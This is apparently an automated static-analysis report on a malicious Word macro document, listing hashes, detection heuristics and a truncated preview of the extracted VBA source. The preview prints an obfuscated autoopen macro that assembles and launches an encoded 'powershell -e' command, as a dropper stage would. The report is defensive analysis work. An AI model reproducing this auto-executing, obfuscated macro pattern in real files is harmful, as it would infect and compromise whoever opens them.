Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 388ca94d387497a4…

MALICIOUS

Office (OLE)

238.2 KB Created: 2019-03-14 20:23:00 (document-metadata timestamp — attacker-controllable, not a reliable build time) Authoring application: Microsoft Office Word (also from document metadata) First seen: 2019-09-30
MD5: 532d9c72657b1a9e48463de47e451a66 SHA-1: add812ae79f6583552379129f506b248bfa1077d SHA-256: 388ca94d387497a4ccc6c2d6df665fe3ccc0e6e57bbef45d64ef654fb2c11a18
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word (OLE) document whose VBA project contains a Sub autoopen, so the macro runs as soon as the document is opened with macros enabled. The macro is obfuscated: the procedures are padded with If blocks of junk arithmetic over randomly named, never-assigned variables, and autoopen runs under On Error Resume Next so errors in that junk cannot abort execution. Between the junk blocks the extracted source assembles a "powershell -e " command line from string fragments and passes it to another procedure (Dx4cAUk), and a GetObject call was also flagged — together consistent with a dropper/downloader stage that launches an encoded (-e) PowerShell command; the fragment values, the decoded PowerShell and any remote URL were not recovered in this static pass. The legacy WordBasic AutoOpen marker is corroborating evidence of auto-execution, not an independent indicator of malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.00536d-6895617-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6895617-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this is the heuristic's generic description; in this report a VBA project was in fact recovered (see macros.bas under Extracted artifacts), so treat the marker as corroborating the VBA autoopen finding rather than as the sole auto-execution evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace URI present in ordinary Office files; it is not a download or command-and-control URL and should not be treated as an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63511 bytes
SHA-256: a8c858c34b9de3f4ed37c497b9a5f534abc23ce9170fbb2d7007e134dad15bc7
Preview script
First 1,000 lines of the extracted script (the listing reproduced below is cut off after the start of autoopen; see the truncation marker at the end)
Attribute VB_Name = "KQAcUAZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Base pointing at Normal.ThisDocument
' together with VB_PredeclaredId = True and VB_Exposed = True is consistent with
' a document (ThisDocument) class module rather than a standard code module.
' The module name KQAcUAZB is randomized in the same style as the identifiers
' used in the procedures below.
' Decoy routine used for obfuscation. It is not called anywhere in the visible
' part of the listing (the preview is truncated, so a call may exist beyond it)
' and it never assigns a return value to nxAAAGoQ.
' Every If compares two identifiers that are never assigned in the visible
' source. If they are undeclared Variants they are Empty, and Empty = Empty is
' True in VBA, so the bodies would run — but each result is only stored in a
' local that is never read, so there is no observable effect.
' NOTE(review): unlike autoopen, this function has no On Error Resume Next, so
' an expression such as Log() of an Empty (zero) operand would raise a run-time
' error if the function were ever invoked — confirm against the full source.
Function nxAAAGoQ()
   ' Six structurally identical junk blocks; only the random identifiers and
   ' numeric constants differ.
   If jAAQAUQA = RUADACQc Then
         tAcAxDk = 454715534 * OUZUAAA
         IZwAA_ = UAQABA - 533947003 + 35956399 + jQ_BAQcG * 622619621 / 209042548 + 744668081 / Chr(104736485 / CSng(820019643 + Round(vZcAUB))) + 667360134 * Log(lUAUAD) - 948886654 - 372609990 + io44AAA_ * CLng(U1CDkCkQ - Atn(FxUABA / 534949009 / 601661375 + NDACDA1))
         LADAAAAQ = 170576220 * wUcAQBX
End If
   If bQAAQB = jx_BA4UQ Then
         FXcBQXQ = 280123386 * MAo4AD
         KAXAGBXQ = BAUA1A - 583669001 + 339345002 + AAD_UDBA * 121282177 / 868691420 + 37122038 / Chr(346988138 / CSng(7650982 + Round(XAAZAAc))) + 975611879 * Log(kAcQDx) - 455380760 - 935515761 + nDUw1cBA * CLng(jAUAAZAA - Atn(A_QwxC / 593676486 / 872387310 + iUDABD4C))
         DAABB1U = 61931354 * iAwoU1Q
End If
   If FBQkwAD = D4AUAw4C Then
         UQcA_QAC = 257653419 * qADAAw4
         oXADAoCU = PDQBUUkA - 304260100 + 334456682 + qBUADD_ * 994188949 / 4475160 + 91925 / Chr(320345915 / CSng(740496223 + Round(wAABAA))) + 666676286 * Log(VxAcBAX1) - 278261970 - 870879439 + zcUZ4CA * CLng(oABXAZ - Atn(aAB1ocwC / 362614953 / 895749923 + kAoUAxAQ))
         oUAGAc = 562840111 * H1BQQADD
End If
   If joXUcGDZ = u4AXZkAB Then
         GA_cDcC = 334285680 * SAkAcAAA
         dBACZB1D = HkADAwAw - 596092142 + 6435043 + QG_AZA * 240839801 / 764156299 + 808231389 / Chr(52494692 / CSng(106295328 + Round(cxZ_AGBA))) + 380448060 * Log(JA1A1k) - 676717503 - 727822569 + NA_oDQB * CLng(FxADwwAA - Atn(uUCxA_ / 428787562 / 470260569 + jDDkA1A))
         uAxGUQX = 284546567 * bUDAUA
End If
   If pwXw_GD = jGBUcDAc Then
         KZ_GZU = 177570453 * akAAGBA
         wZUAQkk = vXwZwAk - 86055359 + 938455822 + jQ1AcAB * 536257606 / 920393907 + 183034731 / Chr(549269876 / CSng(813600159 + Round(zcUoAAQ))) + 613206505 * Log(DAxAAA) - 577745510 - 899786189 + z_wCDB14 * CLng(SDXDwAU - Atn(AxD_xD / 808879468 / 921675192 + O4AcAAQA))
         tACA4AU = 982473411 * OADUAQoc
End If
   If vkAA4AXA = J_UDAC Then
         tDQQAC = 421360664 * PAD_U1A
         tAk_kAk = IcxAAxC - 247030877 + 527787118 + sAwAAo * 615962088 / 20366346 + 675361335 / Chr(777304463 / CSng(169891946 + Round(iAkAAA))) + 133980931 * Log(cABBGAA) - 516549063 - 154188421 + wAQDA1 * CLng(GXAcBU - Atn(uAB1A__Q / 961281954 / 497244746 + cCAAUD))
         bxckxkQX = 919059277 * uUDA4A
End If
End Function
Sub autoopen()
On Error Resume Next
   If GDkwBk = SZADAA Then
         nkBUC4AA = 717530431 * CADAkX
         qAoQwx = ABAQxQUG - 679197136 + 587592201 + bXXZBA * 774010728 / 839324392 + 276798831 / Chr(741094813 / CSng(216296961 + Round(ixQADADQ))) + 763018134 * Log(PwDQCUD) - 517123763 - 355167356 + jCDAXAA * CLng(TQBAQ4 - Atn(M_AQxo / 198988123 / 630318047 + uoGUQZ))
         rQAAk_w = 890318886 * TAxD4AAo
End If
   If wkCAQQkc = cUAoAA_ Then
         jAAcZA = 951914999 * UQDXAw
         MU1QkAw = YX4Qxwk - 624769760 + 664869 + H_ABBA * 596978545 / 955793941 + 572342436 / Chr(351923697 / CSng(336205900 + Round(oGQAAQXZ))) + 866206282 * Log(mDZDBcB) - 63313077 - 674025801 + poUw1G1 * CLng(HUBcD_ - Atn(YDUAA_ / 817093587 / 197926522 + U4QABA))
         vXXwQwAD = 204088795 * axkQDB1
End If
   If BoAoDGAA = TxoQAXA Then
         fAwAUcCk = 246736251 * sAB4DAUA
         C__BZQ_ = ToA4Bk - 791905716 + 744413295 + WBcABZA_ * 276929451 / 678465470 + 112234862 / Chr(809404754 / CSng(740931675 + Round(cAQ1oA))) + 477184742 * Log(kkBUcZ) - 309129642 - 302763095 + mDAwoD * CLng(JDABkA - Atn(wx_Z_C / 498662693 / 770121532 + vAZQDAA))
         HZCAA_ = 370849326 * QkcAACQ1
End If
Dx4cAUk (pB1AU_DQ + "po" + FQGAAQ + "wersh" + bxDGA_ + "ell -e " + BBADC1G1 + a_DAoG + qAUZXA + YooAkAAQ + sUUA_A + wwDAGZ + zQAcAGU + uAkkBQZ)
   If iABAAkk = OZAQAAw Then
         mDQD4AB = 409507374 * YAZAAoD
    
... (truncated)